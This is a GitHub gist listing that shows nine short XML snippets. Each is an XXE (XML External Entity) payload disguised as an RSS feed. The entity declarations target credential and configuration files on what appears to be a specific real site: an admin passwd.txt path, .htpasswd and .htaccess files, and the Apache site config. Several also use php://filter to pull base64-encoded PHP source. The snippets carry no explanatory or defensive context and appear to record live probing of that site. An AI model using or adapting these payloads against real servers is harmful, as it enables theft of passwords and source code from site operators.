Skip to content

Instantly share code, notes, and snippets.

View npinto's full-sized avatar

Nicolas Pinto npinto

View GitHub Profile
@npinto
npinto / x
Created May 22, 2026 07:01
x
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///home/w3news/www/admin/pass/passwd.txt">
]>
<rss version="2.0">
<channel>
<title>F</title>
<link>http://x.com</link>
<description>T</description>
<item>
@npinto
npinto / x
Created May 22, 2026 07:00
x
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=member.class.php">
]>
<rss version="2.0">
<channel>
<title>F</title>
<link>http://x.com</link>
<description>T</description>
<item>
@npinto
npinto / x
Created May 22, 2026 07:00
x
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=pages/account.php">
]>
<rss version="2.0">
<channel>
<title>F</title>
<link>http://x.com</link>
<description>T</description>
<item>
@npinto
npinto / x
Created May 22, 2026 06:59
x
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<rss version="2.0">
<channel>
<title>F</title>
<link>http://x.com</link>
<description>T</description>
<item>
@npinto
npinto / x
Created May 22, 2026 06:36
x
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "/home/w3news/www/admin/pass/passwd.txt">
]>
<rss version="2.0">
<channel>
<title>F</title>
<link>http://x.com</link>
<description>T</description>
<item>
@npinto
npinto / x
Created May 22, 2026 06:35
x
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "admin/.htaccess">
]>
<rss version="2.0">
<channel>
<title>F</title>
<link>http://x.com</link>
<description>T</description>
<item>
@npinto
npinto / x
Created May 22, 2026 06:35
x
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "../admin/.htpasswd">
]>
<rss version="2.0">
<channel>
<title>F</title>
<link>http://x.com</link>
<description>T</description>
<item>
@npinto
npinto / x
Created May 22, 2026 06:35
x
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "./admin/.htpasswd">
]>
<rss version="2.0">
<channel>
<title>F</title>
<link>http://x.com</link>
<description>T</description>
<item>
@npinto
npinto / x
Created May 22, 2026 06:35
x
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "admin/.htpasswd">
]>
<rss version="2.0">
<channel>
<title>F</title>
<link>http://x.com</link>
<description>T</description>
<item>
@npinto
npinto / x
Created May 22, 2026 06:35
x
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/apache2/sites-enabled/000-default.conf">
]>
<rss version="2.0">
<channel>
<title>F</title>
<link>http://x.com</link>
<description>T</description>
<item>